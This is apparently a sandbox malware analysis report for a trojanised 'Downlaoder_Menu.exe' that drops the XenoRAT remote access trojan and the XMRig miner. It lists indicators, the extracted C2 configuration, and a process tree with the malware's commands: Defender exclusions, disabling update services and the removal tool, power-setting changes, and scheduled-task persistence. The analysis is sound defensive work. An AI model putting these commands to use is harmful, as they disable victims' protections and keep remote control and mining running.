Analysis
-
max time kernel
299s -
max time network
298s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
18-09-2024 21:43
General
-
Target
Downlaoder_Menu.exe
-
Size
4.5MB
-
MD5
ec79983fdb605310fac832ba5809e2d6
-
SHA1
ca83d6453563e02decf614d0ce331de493267d2f
-
SHA256
b67d8fc52334fb2309368bf2a738520f1b42436951b211b7896f612b86350c10
-
SHA512
234bb8696c8a6929784165366dc4317d5826738711a7661bf26e4ffab8e958db23d0f2a11542b3f0b5c4c71d62d3e4bc7a730d94d917a21d132d40e2a67ed460
-
SSDEEP
98304:ePj50PrsilC2IbhblAh5+dWspirADIsYAVjw1gI:i5gahZWs80sfsw1R
Malware Config
Extracted
xenorat
hax.onthewifi.com
hAxxx
-
delay
5000
-
install_path
appdata
-
port
1960
-
startup_name
Windows
Signatures
-
Detect XenoRat Payload 2 IoCs
-
XenorRat
XenorRat is a remote access trojan written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 12 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Executes dropped EXE 4 IoCs
-
UPX packed file 17 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of WriteProcessMemory 40 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Downlaoder_Menu.exe"C:\Users\Admin\AppData\Local\Temp\Downlaoder_Menu.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZgBiACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGgAcwBjACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVwBpAG4AZABvAHcAcwAgAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuACAAZQBuAGMAbwB1AG4AdABlAHIAZQBkACAAYQBuACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAGUAcgByAG8AcgAuACAAVgBlAHIAaQBmAHkAIAB0AGgAYQB0ACAAdABoAGUAIABpAG4AcwB0AGEAbABsAGEAdABpAG8AbgAgAHMAbwB1AHIAYwBlAHMAIABhAHIAZQAgAGEAYwBjAGUAcwBpAGIAbABlACwAIABhAG4AZAAgAHIAZQBzAHQAYQByAHQAIAB0AGgAZQAgAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHgAZABtACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAawByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAcABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZgBnACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Downloader_Menu_2.1.exe"C:\Windows\Downloader_Menu_2.1.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\cvtres.exeC:\Users\Admin\cvtres.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\temp_.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe5⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\explorer.exeexplorer.exe6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\risk.exe"C:\Users\Admin\AppData\Roaming\risk.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\XenoManager\risk.exe"C:\Users\Admin\AppData\Roaming\XenoManager\risk.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "Windows" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9D88.tmp" /F4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
1Windows Service
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD550f1cbc27816c3383e75c81819c52eba
SHA1af1e75ca420d5f7338802e42016762a215c89321
SHA25610422c1baedfb15ace78d300754ac7803dff07278a84cedc609371661cdad6a2
SHA512f59fd9d48dacf9114ed1dc42f31dc483e90f6020c6aee941da672719f2656b46ec8a454455176db9288a7fcdeb6d11178d548ea0ec421d2ca55aa4a22fc64054
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
Filesize
17KB
MD51634224d3c35d13d883cbbed5ca80dce
SHA1a5a8ed821845b14dde9fd2b4277b19e58ff2bf63
SHA2566c2c8278a8459065bc779a1a06fc3e6b735ca1873f89f585e78db77d7c9397a6
SHA5120f29e243c7b5fe52260523eed7edabd7102d7f47758e4d86cc45a2c831da07512e27a52269071009839228c03bc2647b69f446af622ec925cd18013a931b8233
-
Filesize
1KB
MD59a6fe311e662e223ef8c4ccc6b6d6583
SHA18d4e33bfedc9e5bc19823ea499352bd92515dd9d
SHA256b7b2504e05c04b3da11cabb4f4b13e28e924dcfa506c874e936998f71a7181fd
SHA512fe90f0f8b1c7a51e24158463a53b8ab71eb97a6d0510e43bb61964b077c5a801a1ed62eed3d3f4b3a1b780d7a336291b9402e9657ee58759c6a68622eacbaee7
-
Filesize
435B
MD5879d04b9f235dff082dee4bd4cb81df9
SHA15e95e9a98287ac043e83a7360906726e8eb6920e
SHA25610bdfc3eba645f3edc746f52b503a0161cc5d75c00a49e28bcac09be026732fa
SHA5122161b953a86b75db3a4bb40ba067ad374a72ac73c65b9add92b5e218654e0db2937fda97995d26bbf1502b3d03565379b889e6ca501295d1f4b66fcf9715cd0a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5c824a7486b8af655d347fd367022d0d2
SHA117bb7f077818e6d5ecb3be0fc681d341b82dd72b
SHA256025ef7965c1b7643ff8d71a48c71d62ce4380e3ac6324ecf51f80717a4d61c14
SHA512a026982ac700263bf2dfd5415365dbe52b0e59095adfd00c937af28f5c84978faf65aeb2cd2c7c9dc5c7b38dc82dc2acc2d7b91e96026e73a881483168586bc1
-
Filesize
45KB
MD52cb05f0d4360327b33956fedf516c6fe
SHA14562653b1361ce66ded9633e5883d00184c08796
SHA256af82f7a1ca358d54f5da73409d05360c265f7569fb768218051c7ef2620e66e6
SHA512f0967245d1693d74d146356c9540a9ae0b848a96a6e58eacc111a951a6b32e01f325f8848b2b0c66b38dbfcdcb37e052ccfc27cf9b3b6752f3cba876181f6fa6
-
Filesize
5KB
MD5c9698a20e68954387eed40d36d17c087
SHA1c50cf0ac1cbf51a89b6c1b816e5e63e7e7287179
SHA2563a71a978827979baeec7b94607e93a72cf2a51a7204a572f68a3788d83b87d8f
SHA512f8099e4e6bf6e1cd850faa398b3ef8862852342bef0ec8a7318495be6e82ddf903834b951faa6c5bbd0879414dcaccf3fec6ade4ef74054e08011d718ed1e813
-
Filesize
5.4MB
MD596b7afe999094957a1ce5b1c0ee0cb2f
SHA16b5d48b5f75246993de0263d27d2b9cdcc6ebf3f
SHA256d22cb88bfae5285d86cb35c2acba863f85b2e63c241c1959d15ca3416bcb5e4a
SHA512ed7e02b26664b442f95fdf83af03d7773c017dadf3bec8c2d37cc2b30c49b6751a3104b85f00cfedbd145f422635e5b3ad49ea80adf7c0a92b06db474c6a238c
-
Filesize
1KB
MD55e817bbd9ef2f8821aa0283b20a51923
SHA1102ca518d89653fb400636e660fa3fc276235c5c
SHA25627f2822ca2be992ebb6e1000aa3a2c39e9b4ff7e257cb45eadda8776d65018a7
SHA512f21388e0655e6733abc70ff9fe2bbfdca00d81d2e7a09236d679293df34a966990f689f2d62119cdd877c7aeda35ab0c2b3c66108bc6b721e5dea34a93342d2e
-
Filesize
5.4MB
MD5ff46d6b0970c55dba491b6dd06384f84
SHA1c8be08575f2174a9a00bff33e3b1a7c1d9c4a025
SHA256a5ad5faab69350449e8fd14adcb262ecb289696d5f0da374891e9eb226824c85
SHA512b0d5b4eb5d9b58f35f218dffb43956716adb062626a75fcde11ba517e9d16d015f8a0d90ae72fbad47c87cbec86ef3e6a16347900f0c0be97e47f6d58bdac3a6
-
Filesize
1KB
MD55a0a8376c0e45cc25d4050920cee3dcc
SHA12de4ddf90f3165b245bd9f77c145c8f770c98b85
SHA25686af1b7845145745ccaf65bf0dbeb1a981701ad0c6793c2dc93c0c2f2aef8d25
SHA512f5afd39336d6b9f0590d68a716e8c3b403c13b98aae34d76f43e34698d2c6485e3dbce7a6439623362effec50ab0b2696b1ed25e377ba4dae75047ef419f51c0
-
Filesize
4.4MB
MD59d3195f106a540570da0d038bc07cf68
SHA133c1dd7a4101d1622b4d9268da0b731e00ddca39
SHA256240b3b43f49f5430d9d2e263e857d6e4c9c98af09fe8ae7d9c0e6b7c9eeacfce
SHA5129c7b0da3e2a01a05f61e39648d31851c5b0d70d7f20d865792cf4c8cec39ad764b2f11833116dbcdea57f3ec1785345921defbd656eab4fc23095b63ba889f69
-
Filesize
136KB
-
Filesize
24KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
5.2MB
-
Filesize
32KB
-
Filesize
200KB
-
Filesize
40KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
3.3MB
-
Filesize
216KB
-
Filesize
600KB
-
Filesize
652KB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
5.0MB
-
Filesize
5.0MB
-
Filesize
72KB
-
Filesize
6.2MB
-
Filesize
120KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
304KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
128KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB